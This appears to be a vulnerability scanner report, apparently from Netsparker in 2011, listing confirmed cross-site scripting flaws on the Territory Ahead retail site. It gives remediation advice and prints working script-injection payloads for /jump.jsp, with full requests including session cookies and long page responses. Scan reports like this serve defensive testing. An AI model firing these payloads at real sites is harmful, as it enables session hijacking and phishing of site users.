<td><a href="http://www.territoryahead.com/shopping/catalogquickshop/cqsmain.jsp" onMouseOver="rollover('top_cqs','/images/us/global/globalnav/catquickshop_on.gif');" onMouseOut="rollover('top_cqs','/images/us/global/globalnav/catquickshop_off.gif');"><img src="/images/us/global/globalnav/catquickshop_off.gif" border=0 alt="Catalog Quickshop" name="top_cqs"></a></td>

<td class="navheaderbg3"><a href="http://www.territoryahead.com/basket/basketmain.jsp" onMouseOver="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_on.gif');" onMouseOut="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_off.gif');"><img src="/images/us/global/globalnav/shopbasket_off.gif" border=0 alt="Shopping Bag" name="top_shopbasket"></a></td>
<td class="navheaderbg3"><div class="iteminbagtext" nowrap>  (0 items) </div></td>
</tr>
</table></td>
</tr>
<tr>
<td colspan="2" class="navheaderrule1"><img src="/images/us/global/globalgraphics/spacer01.gif" width="980" height="1" border="0" alt=""></td>
</tr>
<tr>
<td colspan="2"><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE"><img alt="The Territory Ahead" src="/images/us/global/globalnav/logo01.jpg" border="0"></a></td>
</tr>
<tr>
<td colspan="2"><table id="menu" border="0" cellspacing="0" cellpadding="0" width="980">
<tr>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE" onMouseOver="rollover('top_home','/images/us/global/globalnav/home_on.gif');" onMouseOut="rollover('top_home','/images/us/global/globalnav/home_off.gif');"><img src="/images/us/global/globalnav/home_off.gif" border=0 alt="Home" name="top_home"></a></td>
<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=1057&path=1%2C2%2C1057' onmouseover="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_on.gif');popup('Menu1057','MenuImg1057');" onmouseout="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_off.gif');popdown();"><img border="0" name="MenuImg1057" id="MenuImg1057" src="/images/us/global/globalnav/globalnav04_off.gif" alt="What's New"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4' onmouseover="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_on.gif');popup('Menu4','MenuImg4');" onmouseout="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_off.gif');popdown();"><img border="0" name="MenuImg4" id="MenuImg4" src="/images/us//global/globalnav/globalnav01_off.gif" alt="Men's Territory"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=5&path=1%2C2%2C5' onmouseover="rollover('MenuImg5','/images/us//global/globalnav/globalnav02_on.gif');popup('Menu5','MenuImg5');" onmouseout="rollover('Menu..

Cross-site Scripting

6 TOTAL

IMPORTANT

CONFIRMED

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045..

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	'"--></style></script><script>alert(0x000045)</script>

Request

GET /jump.jsp?'"--></style></script><script>netsparker(0x000045)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409741; JSESSIONID=asM_YQOowXta; RecentViewedItems=9833/8773/9687/3443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 19:17:33 GMT
Server: Apache
ETag: "AAAAS53/wya"
Last-Modified: Wed, 02 Mar 2011 19:15:27 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>The Territory Ahead</title>

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

</head>
<body class="main" >


<script language="javascript1.1" src="/text/cm/eluminate.js"></script>
<script language="javascript1.1" src="/text/cm/cmdatatagutils_territoryahead.js"></script>

<script language="javascript1.1" src="/includes/cm/cmtaggingservices_TTA_top.js"></script>




<div id="main-background"><div id="container">

<table align="center" border=0 width=980 cellpadding=0 cellspacing=0>
<tr>
<td colspan="5" class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
<td colspan=3 class=navheaderbg>





<table border=0 width=980 cellpadding=0 cellspacing=0>

<tr>
<td class="navheaderbg2"><a href="javascript:openMe('/text/customerservice/livechatpop.jsp?iProductID=','MoreInfo');"><img src="/images/us/global/globalnav/phnumber.gif" border="0" alt="1-800-882-4323" title="Live Chat"></a></td>
<td class="navheaderbg2" align="right"><table border="0" cellspacing="0" cellpadding="0" align="right">
<tr valign="middle">

<td><a href="https://www.territoryahead.com/account/login/loginmain.jsp" onMouseOver="rollover('top_login','/images/us/global/globalnav/login_on.gif');" onMouseOut="rollover('top_login','/images/us/global/globalnav/login_off.gif');"><img src="/images/us/global/globalnav/login_off.gif" border=0 alt="Log In" name="top_login"></a></td>

<td><a href="https://www.territoryahead.com/account/orderhistory/orderstatus.jsp" onMouseOver="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_on.gif');" onMouseOut="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_off.gif');"><img src="/images/us/global/globalnav/orderstatus_off.gif" border=0 alt="Order Status" name="top_orderstatus"></a></td>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=195&itemType=CATEGORY&path=1%2C3%2C195" onMouseOver="rollover('top_customerserv','/images/us/global/globalnav/customerserv_on.gif');" onMouseOut="rollover('top_customerserv','/images/us/global/globalnav/customerserv_off.gif');"><img src="/images/us/global/globalnav/customerserv_off.gif" border=0 alt="Customer Service" name="top_customerserv"></a></td>
<td><a href="http://www.territoryahead.com/shopping/catalogquickshop/cqsmain.jsp" onMouseOver="rollover('top_cqs','/images/us/global/globalnav/catquickshop_on.gif');" onMouseOut="rollover('top_cqs','/images/us/global/globalnav/catquickshop_off.gif');"><img src="/images/us/global/globalnav/catquickshop_off.gif" border=0 alt="Catalog Quickshop" name="top_cqs"></a></td>

<td class="navheaderbg3"><a href="http://www.territoryahead.com/basket/basketmain.jsp" onMouseOver="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_on.gif');" onMouseOut="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_off.gif');"><img src="/images/us/global/globalnav/shopbasket_off.gif" border=0 alt="Shopping Bag" name="top_shopbasket"></a></td>
<td class="navheaderbg3"><div class="iteminbagtext" nowrap>  (0 items) </div></td>
</tr>
</table></td>
</tr>
<tr>
<td colspan="2" class="navheaderrule1"><img src="/images/us/global/globalgraphics/spacer01.gif" width="980" height="1" border="0" alt=""></td>
</tr>
<tr>
<td colspan="2"><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE"><img alt="The Territory Ahead" src="/images/us/global/globalnav/logo01.jpg" border="0"></a></td>
</tr>
<tr>
<td colspan="2"><table id="menu" border="0" cellspacing="0" cellpadding="0" width="980">
<tr>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE" onMouseOver="rollover('top_home','/images/us/global/globalnav/home_on.gif');" onMouseOut="rollover('top_home','/images/us/global/globalnav/home_off.gif');"><img src="/images/us/global/globalnav/home_off.gif" border=0 alt="Home" name="top_home"></a></td>
<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=1057&path=1%2C2%2C1057' onmouseover="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_on.gif');popup('Menu1057','MenuImg1057');" onmouseout="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_off.gif');popdown();"><img border="0" name="MenuImg1057" id="MenuImg1057" src="/images/us/global/globalnav/globalnav04_off.gif" alt="What's New"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4' onmouseover="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_on.gif');popup('Menu4','MenuImg4');" onmouseout="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_off.gif');popdown();"><img border="0" name="MenuImg4" id="MenuImg4" src="/images/us//global/globalnav/globalnav01_off.gif" alt="Men's Territory"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=5&path=1%2C2%2C5' onmouseover="rollover('MenuImg5','/images/us..

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp?itemID=9687&itemType=PRODUCT&path='%3E%3Cscript%3Ealert(9)%3..

Parameters

Parameter	Type	Value
itemID	GET	9687
itemType	GET	PRODUCT
path	GET	'><script>alert(9)</script>
iProductID	GET	9687
sortBy	GET	Sort

Request

GET /jump.jsp?itemID=9687&itemType=PRODUCT&path='%3E%3Cscript%3Enetsparker(9)%3C/script%3E&iProductID=9687&sortBy=Sort HTTP/1.1
Referer: https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409741; JSESSIONID=asM_YQOowXta; RecentViewedItems=9833/8773/3443/9687
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:18:29 GMT
Server: Apache
ETag: "AAAAS53/+dI"
Last-Modified: Wed, 02 Mar 2011 19:16:22 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: RecentViewedItems=9833/8773/3443/9687; Path=/; Expires=Wed, 16-Mar-2011 19:16:22 GMT
Connection: close
Content-Type: text/html;charset=UTF-8



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>All Seasons Vest - The Territory Ahead</title>

<link href="http://www.territoryahead.com/jump.jsp?itemID=9687&itemType=PRODUCT" rel="canonical" />

<meta name="description" content="The Territory Ahead - All Seasons Vest - All Seasons Vest">

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

<script type="text/javascript">
<!--

var perzErrMsg = "";
function formValidate() {
var blnIsValid = true;
var blnValidQty = false;
var bIsCheckout = false;
var sCheckoutMsg = "";
var bIsPerzValid = true;

//alert("ATBOCO Value: " + document.ProductDetail.ATBOCO.value);
if(document.ProductDetail.ATBOCO.value == "1"){
bIsCheckout = true;
}
//alert("ATBOCO: " + document.ProductDetail.ATBOCO.value + ", Is Checkout: " + bIsCheckout);
var blnCustomOptions = false; //added for customization
for (i=0;i<document.ProductDetail.elements.length;i++){
var strSuffix = "";
var elementName = document.ProductDetail.elements[i].name;
//alert("Name: " + elementName + ", Type: " + document.ProductDetail.elements[i].type + ", Value: " + document.ProductDetail[elementName].value);
if (elementName.indexOf("qty") == 0) {
// if the quantity is greater than zero then check the
// options to make sure they've been set.
var qtyval=0;

qtyval = document.ProductDetail[elementName].value;

// GRG Added check for qty to be larger than 5 per cbrt request #03048.
if ((qtyval > 0) && (qtyval < 6)) {
blnValidQty = true;
if (elementName.length > 3) {
// multi-product
strSuffix = elementName.substring(3);
}
// Build CheckOut Message
sCheckoutMsg += "\r\n" + qtyval + " " + eval("document.ProductDetail." + "pName" + strSuffix + ".value");
// Search for options...
var strOptName = "options" + strSuffix;
for (j=0;j<document.ProductDetail.elements.length;j++) {
if (document.ProductDetail.elements[j].name == strOptName) {

if (document.ProductDetail.elements[j].type == "select-one") {
var intSelected = document.ProductDetail.elements[j].selectedIndex;
if(document.ProductDetail.elements[j].options[intSelected].value == 0) {
blnIsValid = false;
}
}// end select handler
}// end name check
}// end for(j)
if(blnIsValid && blnValidQty && bIsPerzValid) {
